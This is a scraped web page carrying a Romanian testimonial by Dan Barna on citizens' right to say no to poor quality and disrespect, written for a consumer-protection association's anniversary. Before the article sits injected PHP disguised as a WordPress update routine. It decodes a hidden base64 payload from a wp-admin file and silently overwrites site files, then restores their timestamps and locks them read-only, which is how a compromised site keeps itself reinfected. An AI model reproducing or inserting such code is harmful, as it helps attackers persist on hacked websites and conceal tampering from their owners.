$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Dan Barna – Dreptul cetateanului de a spune NU – O noua atitudine

Cu ocazia celebrării celor 9 ani de la înfiinţarea Asociaţiei Naţionale pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România – InfoCons domnul DAN BARNA a oferit un testimonial pentru consumatorii din Romania:

 

Dreptul cetăţeanului de a spune NU!

Ce mai înseamnă oare astăzi termenul de cetăţean? Cât de aproape mai suntem oare de sensul original al termenului născut în oraşele state greceşti, acela de locuitori ai cetăţii care aveau dreptul – spre deosebire de celelalte categorii: sclavi, venetici, călători – de a decide , de a spune da sau nu asupra treburilor obștii. Cât de mult ne mai pasă oare de cetatea de dincolo de zidurile locuinţei nostre? ”Păsarea” vine din informare, informarea duce la educaţie iar educaţia duce în cele din urmă la cultură. După aproape 50 de ani de beznă comunistă în care primeam ce găseam, acceptând practic orice, este nevoie de “o9atitudine!”cum inspirat a denumit  Asociaţia Naţională pentru Protecţia Consumatorilor prezenta campanie.

Pentru asumarea rolului importat de informare şi a celui infinit mai greu de educare a cetăţenilor de acum şi a celor ce vor veni felicit A.N.P.C.P.P.S. Romania şi vă doresc izbânzi pe calea învăţării cetăţenilor în a spune NU – proastei calităţi, lipsei de respect, dispreţului sau umilinţei.

Să aveţi campanii inspirate şi să vă păstraţi oamenii frumoşi şi rari care vă fac să existaţi.

 

Voie bună

 

 

Dan BARNA

Managing Partner

Structural Consulting™ Group -www.fonduri-structurale.ro

By o9admin